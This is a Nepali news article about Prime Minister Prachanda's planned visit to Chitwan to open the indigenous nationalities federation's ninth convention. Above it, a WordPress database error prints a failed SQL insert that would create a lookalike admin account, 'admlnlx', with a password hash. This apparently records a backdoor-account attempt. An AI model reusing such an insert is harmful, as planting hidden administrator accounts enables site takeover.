WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeJP5Fg0sA.0GQ/0yq4pw7GF5qarMR0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 02:03:38', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २०–
प्रधानमन्त्री एवंम नेकपा माओवादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ चितवन आउनु हुने भएको छ ।
आउँदो पुस २ देखि ४ गतेसम्म चितवनमा हुन लागेको नेपाल आदिवासी जनजाति महासंघको नवौं महाधिवेशनको समुद्घाटन गर्न प्रधानमन्त्री दाहाल चितवन आउन लाग्नु भएको हो । आज आदिवासी जनजाति महासंघका घटक जातिय संगठनका प्रमुखहरुको छलफलमा महासंघका अध्यक्ष नगेन्द्र कुमार कुमालले प्रधानमन्त्री चितवन आउने तय भई सकेको जानकारी दिनुभयो । उहाँले प्रधानमन्त्रीसंगै विभिन्न पार्टीका शीर्ष नेताहरु समेत चितवन आउने जानकारी दिनुभयो ।
महासंघको महाधिवेशन पुस २ गते भरतपुरस्थित वीरेन्द्र बहुमुखी क्याम्पसको प्राङगणमा समुद्घाटन हुनेछ । अहिले महाधिवेशनको तयारी धमाधम भईरहेको छ । विभिन्न उपसमिति निर्माण गरि तयारी थालिएको महासंघका उपाध्यक्ष सूर्यबहादुर भुजेलले जानकारी दिनुभयो । महासंघ चितवनका अध्यक्ष पदमबहादुर गुरुङले जिल्लामा महाधिवेशनको तयारी व्यापक रुपमा भईरहेको जानकारी दिनुभयो । उहाँले उद्घाटनको दिन भव्य झाकी सहितको र्याली समेत निश्किने बताउनुभयो ।